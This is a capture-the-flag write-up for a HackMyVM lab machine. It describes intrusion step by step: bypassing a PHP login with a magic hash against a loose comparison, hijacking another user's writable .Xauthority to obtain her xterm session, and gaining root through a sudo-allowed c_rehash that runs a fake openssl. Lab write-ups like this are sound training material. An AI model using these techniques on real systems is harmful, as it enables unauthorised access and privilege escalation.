Very interesting machine from HackMyVm, can be download here.
Nmap scan ports.
Check source code of index.html.
Add ".bak" to the extension and scan files of port 80.
Download check.bak and check source code.
<?php // Login part. $pass = $_POST['password']; //marco please dont use md5, is not secure. //$passwordhashed = hash('md5', $pass); $passwordhashed = hash('sha256',$pass); if ($passwordhashed == '0e0001337') { //Your code here } else{ //Another code here } //To finish ?>
Here is php magic hashes. We can find some magic hash strings from google.
wget https://raw.githubusercontent.com/spaze/hashes/master/sha256.md
Login as user "marco" and password from the magic hashes. Then we get a ssh key.
Download the file, remove extra spaces, and chmod 600, then we can login ssh as marco.
In marco's home folder, file ".x" contains the password of marco.
Find another user maria. And in maria's home folder, we find a script file. Also, we noticed .Xauthority file which is writable, but size is 0 now.
Check myterm.sh, just called "xterm" on special display.
Use pspy64, find cron job executes myterm.sh each miniute.
What is .Xauthority? Ask google.
Since .Xauthority store cookies of xterm, and maria's .Xauthority is writable, we may replace it with marco's .Xauthority.
Use rdesktop to login 3389 as user marco. Use the password we found in marco's home folder.
Check id, we are marco now.
Replace maria's .Xauthority file with marco's.
After a while, in rdesktop, shows a new xterm windows, which id is maria. (Another way is to use "xhost +" command, told me by TataYoyo .)
Now we can create .ssh folder, upload our public key.
Now we can login ssh as user maria.
sudo -l.
Check /usr/bin/c_rehash, it's a perl script file.
Try to run it without any parameters. Nothing happened.
Check the source code, we noticed c_rehash needs openssl.
Check help page online, we confirmed that openssl is the key.
Enter home folder of maria, create fake openssl, then run c_rehash. BOOM! Get root finally.